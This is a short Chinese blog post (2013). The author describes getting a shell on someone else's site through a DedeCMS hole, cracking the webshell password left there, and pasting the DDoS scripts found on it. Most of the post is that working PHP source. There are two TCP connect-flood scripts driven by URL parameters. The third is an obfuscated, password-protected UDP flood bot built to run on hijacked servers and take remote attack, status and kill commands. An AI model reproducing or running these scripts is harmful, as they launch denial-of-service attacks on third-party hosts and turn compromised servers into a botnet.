无聊拿了几个phpddos的脚本
破落日 | 2013-10-20 00:10
起初是在群里看到这张图
看到这么多shell不明觉厉啊
谷歌了一下,发现这个
看样子应该是前段时间批量getshell搞的?
随便找了个站,直接dede getshell,找到他的马,发现加密之。
在线破解之!
发现密码是1....
在目录下面发现几个ddos的脚本?
idcsynn.php
<?php ini_set("display_errors", "Off"); $packets = 0; $ip = $_GET['ip']; $port = $_GET['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_GET['time']; $time = time(); print "BY:赛赛 QQ:534843666压力测试-连接服务器正常.....<br>"; $max_time = $time+$exec_time; while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0); } echo "================================================<br>"; echo " <font color=blue>www.phpddos.com<br>"; echo " BY:赛赛 QQ:534843666压力测试<br>"; echo " 作者:BY:赛赛<br>"; echo " 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>"; echo "================================================<br><br>"; echo " 攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>"; echo " 攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>"; echo " 攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>"; echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n";
idcsyn.php
<?php ini_set("display_errors", "Off"); $packets = 0; $ip = $_GET['ip']; $port = $_GET['port']; set_time_limit(0); ignore_user_abort(FALSE); $exec_time = $_GET['time']; $time = time(); print "高效率IDC机房phpddos压力测试-作者Qq304386149-连接服务器正常.....<br>"; $max_time = $time+$exec_time; while(1){ $packets++; if(time() > $max_time){ break; } $fp = fsockopen("tcp://$ip", $port,$errno,$errstr,0); } echo "================================================<br>"; echo " <font color=blue>www.phpddos.com<br>"; echo " 高效率IDC机房phpddo压力测试<br>"; echo " 作者:惩罚者<br>"; echo " 警告:本程序带有攻击性,仅供安全研究与教学之用,风险自负!</font><br>"; echo "================================================<br><br>"; echo " 攻击包总数:<font color=Red><span class=\"text\">".$packets." 个数据包</span><br><br></font>"; echo " 攻击总流量:<font color=Red><span class=\"text\">".round(($packets*65*8)/(1024*1024),2)." Mbps</span><br><br></font>"; echo " 攻击总字节:<font color=Red><span class=\"text\">".time('h:i:s')." 字节</span><br><br></font>"; echo "Packet complete at ".time('h:i:s')." with $packets (" .round(($packets*65*8)/(1024*1024),2). " Mbps) packets averaging ". round($packets/$exec_time, 2) . " packets/s \n"; ?>
byxxshell.php
<?php $oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0="zinuo"; $ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_SERVER["SERVER_NAME"]); $ooooooooo0oo0oo0o0o0o0oO0OO0O0OOO0o0="变异血腥15.00+"; $o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o="key.txt"; if(!oOo00o0OOo0o0000o0o0O($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o)){OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"die\";\n?>",true); }$Oooo0ooO0oo0ooooooo0 = include $o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o; if(!isset($_GET["act"])){OOOOOOOOOOoOo00o0OOo0o0000o0o0O('<title></title><body style="background-color:#000000; margin:0px; text-align:center"> <a href="http://wpa.qq.com/msgrd?V=1&Uin=675519299&Site=子诺血腥_ddos&Menu=yes" target="_blank"><img src="http://v2.freep.cn/3tb_131003211134t12m512293.jpg " align="middle" border="0" width="400" height="160" style="margin-top:200px; margin-left:auto; margin-right:auto;" /></a> </body>'); }if($_GET["act"]=="die"){if(!oo00o0OOo0o00O("fsockopen")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器缺少必要函数支持."); }if(!oo00o0OOo0o00O("set_time_limit") or !oo00o0OOo0o00O("ignore_user_abort")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器无法启动自动攻击."); }if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击."); }OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"die\";\n?>",true); OOOOOOOOOOoOo00o0OOo0o0000o0o0O("died"); }if($_GET["act"]=="view"){if(!oo00o0OOo0o00O("fsockopen")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器缺少必要函数支持."); }if(!oo00o0OOo0o00O("set_time_limit") or !oo00o0OOo0o00O("ignore_user_abort")){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL服务器无法启动自动攻击."); }if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击."); }OOOOOOOOOOoOo00o0OOo0o0000o0o0O("ok:".$ooooooooo0oo0oo0o0o0o0oO0OO0O0OOO0o0."|".$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0."|".$Oooo0ooO0oo0ooooooo0); } if($_GET["act"]=="attack"){ ignore_user_abort (true); set_time_limit(0); $O0O0o0Oo0Oo0oO0oOoO0OOo00O00O0o0O0O0o0O0o0O0o000O0O0o = 0; if(!isset($_GET["ip"]) or !isset($_GET["port"]) or !isset($_GET["exec_time"]) or !isset($_GET["att_size"])){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:参数提交错误"); }if(@oOo00o0OOo0o000000O($_GET["pass"])<>oOo00o0OOo0o000000O($oooo0o00o0o0o0o0o0o0o00000o0o0o0o0o0oo0o0o0o0o0oo0)){OOOOOOOOOOoOo00o0OOo0o0000o0o0O("error:SHELL密码错误,无法攻击."); }OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"true\";\n?>",true); $ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0 = gethostbyname($_GET["ip"]); $rand = oOo00o0OOo0o000000O($_GET["port"]); $exec_time = oOo00o0OOo0o000000O($_GET["exec_time"]); $att_size= oOo00o0OOo0o000000O($_GET["att_size"]); $time = time(); $max_time = $time+$exec_time; $dosstr=OOOOO0o0o0o0o(100); for($i=0; $i<floor($att_size/100); $i++){$out .= "X".$dosstr; }while(1){$Oooo0ooO0oo0ooooooo0 = include $o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o; if ($Oooo0ooO0oo0ooooooo0=="true"){$O0O0o0Oo0Oo0oO0oOoO0OOo00O00O0o0O0O0o0O0o0O0o000O0O0o++; if(time() > $max_time){OOOOOOO0OOO0O0O0O00O0O0($o0O0o0O0o0O0o0O0o0oo0o0o0o0O0o,"<?php\n return \"die\";\n?>",true); break; }$fp = fsockopen("udp://$ooooo00oo0000oo0oo0oo00ooo0ooo0o0o0", $rand, $errno, $errstr, 5); if($fp){fwrite($fp, $out); fclose($fp); }}elseif($Oooo0ooO0oo0ooooooo0=="die"){ die("I am dying!"); }}@OOOOOOOOOOoOo00o0OOo0o0000o0o0O("over"); } function OOOOOOO0OOO0O0O0O00O0O0($o0Oo0o0O00o00Oo,$O0oooooOO0oo0oo0o0o,$O0o0o0O0Oo0=false){ $o0Oo0o0O00o00Oo=dirname(__FILE__)."/".$o0Oo0o0O00o00Oo; if ($O0o0o0O0Oo0==false){file_put_contents($o0Oo0o0O00o00Oo,$O0oooooOO0oo0oo0o0o,FILE_APPEND); }else{ file_put_contents($o0Oo0o0O00o00Oo,$O0oooooOO0oo0oo0o0o);} }function oo00o0OOo0o00O($a){return function_exists($a); }function oOo00o0OOo0o000000O($a){return trim($a); }function oOo00o0OOo0o0000o0o0O($a){return file_exists($a); }function OOOOOOOOOOoOo00o0OOo0o0000o0o0O($a){return exit("".$a); }function OOOOO0o0o0o0o($i){$o0o0o0O0O0O00O00o00o0oO0O0o = "abcdefghijklmnopqrstuvwxyz!@#$%^&*()_+QWERTYUIOP{}ASDFGHJKL:ZXCVBNM<>?/"; $oo0o0O0o00oOo0O0o0OoOOoO0OoOoO = ""; for($o0o0o0ooooooo=0;$o0o0o0ooooooo<$i;$o0o0o0ooooooo++){ $oo0o0O0o00oOo0O0o0OoOOoO0OoOoO.= substr($o0o0o0O0O0O00O00o00o0oO0O0o,rand(0,(strlen($o0o0o0O0O0O00O00o00o0oO0O0o)-1)),1); }return $oo0o0O0o00oOo0O0o0OoOOoO0OoOoO; } ?>
贴出来给大家看看 =_=
留言评论(旧系统):